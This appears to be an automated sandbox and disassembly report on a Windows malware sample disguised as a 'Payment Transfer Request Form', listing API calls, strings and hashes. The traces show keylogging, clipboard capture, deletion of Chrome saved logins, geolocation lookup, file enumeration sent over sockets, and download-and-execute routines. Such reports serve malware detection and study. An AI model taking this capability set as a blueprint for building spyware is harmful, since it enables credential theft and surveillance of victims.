                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                              • InternetCloseHandle.WININET(00000000), ref: 00419407
                                              • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                              Strings
                                              • http://geoplugin.net/json.gp, xrefs: 004193A2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$FileRead
                                              • String ID: http://geoplugin.net/json.gp
                                              • API String ID: 3121278467-91888290
                                              • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                              • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                              • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                              • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                              • GetLastError.KERNEL32 ref: 0040A999
                                              Strings
                                              • UserProfile, xrefs: 0040A95F
                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                              • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                              • API String ID: 2018770650-1062637481
                                              • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                              • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                              • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                              • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                              • GetLastError.KERNEL32 ref: 00415CDB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3534403312-3733053543
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00408393
                                                • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                                • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                                • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                              • FindClose.KERNEL32(00000000), ref: 004086F4
                                                • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                              Similarity
                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                              • String ID:
                                              • API String ID: 1824512719-0
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 0040949C
                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                              • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                              • GetKeyState.USER32(00000010), ref: 004094B8
                                              • GetKeyboardState.USER32(?), ref: 004094C5
                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                              Similarity
                                              • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                              • String ID:
                                              • API String ID: 3566172867-0
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                              • String ID:
                                              • API String ID: 276877138-0
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              Strings
                                              Similarity
                                              • API ID: File$Find$CreateFirstNext
                                              • String ID: H"G$`'G$`'G
                                              • API String ID: 341183262-2774397156
                                              APIs
                                                • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                              • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                              Strings
                                              Similarity
                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                              • String ID: PowrProf.dll$SetSuspendState
                                              • API String ID: 1589313981-1420736420
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                              • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                              Strings
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              APIs
                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                              • wsprintfW.USER32 ref: 0040A13F
                                                • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                              Strings
                                              Similarity
                                              • API ID: EventLocalTimewsprintf
                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                              • API String ID: 1497725170-248792730
                                              APIs
                                              • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                              • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                              • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                              • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                              Strings
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID: SETTINGS
                                              • API String ID: 3473537107-594951305
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004087A5
                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                              Similarity
                                              • API ID: Find$File$CloseFirstH_prologNext
                                              • String ID:
                                              • API String ID: 1157919129-0
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                              • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                              • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                              Similarity
                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                              • String ID:
                                              • API String ID: 745075371-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040784D
                                              • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                              Similarity
                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                              • String ID:
                                              • API String ID: 1771804793-0
                                              APIs
                                                • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                              • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                                • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                                • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                              Similarity
                                              • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 1735047541-0
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: A%E$A%E
                                              • API String ID: 0-137320553
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                              Strings
                                              Similarity
                                              • API ID: DownloadExecuteFileShell
                                              • String ID: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$open
                                              • API String ID: 2825088817-2300244729
                                              APIs
                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                                • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                                • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                                                • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                                              Strings
                                              Similarity
                                              • API ID: CloseCreateInfoParametersSystemValue
                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                              • API String ID: 4127273184-3576401099
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                              • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                              • _wcschr.LIBVCRUNTIME ref: 0044F038
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                              • String ID:
                                              • API String ID: 4212172061-0
                                              • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                              • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                              • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                              • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                              • String ID:
                                              • API String ID: 2829624132-0
                                              • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                              • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                              • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                              • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                              • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                              • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                              • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                              APIs
                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                              • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                              • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                              • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                              • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                              • ExitProcess.KERNEL32 ref: 004407EF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                              • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                              • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                              • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                              APIs
                                              • OpenClipboard.USER32(00000000), ref: 0040A65D
                                              • GetClipboardData.USER32(0000000D), ref: 0040A669
                                              • CloseClipboard.USER32 ref: 0040A671
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseDataOpen
                                              • String ID:
                                              • API String ID: 2058664381-0
                                              • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                              • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                              • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                              • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-3916222277
                                              • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                              • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                              • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                              • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              • Opcode ID: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                                              • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                                              • Opcode Fuzzy Hash: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                                              • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: GetLocaleInfoEx
                                              • API String ID: 2299586839-2904428671
                                              • Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                              • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                              • Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                              • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNextsend
                                              • String ID:
                                              • API String ID: 4113138495-0
                                              • Opcode ID: 9ba1950aaa4909eb7c6bc4a7abdee236abe9e82e84a9556be4593e8ae34175c7
                                              • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                              • Opcode Fuzzy Hash: 9ba1950aaa4909eb7c6bc4a7abdee236abe9e82e84a9556be4593e8ae34175c7
                                              • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                              • String ID:
                                              • API String ID: 1663032902-0
                                              • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                              • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                              • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                              • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                              • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                              • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                              • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
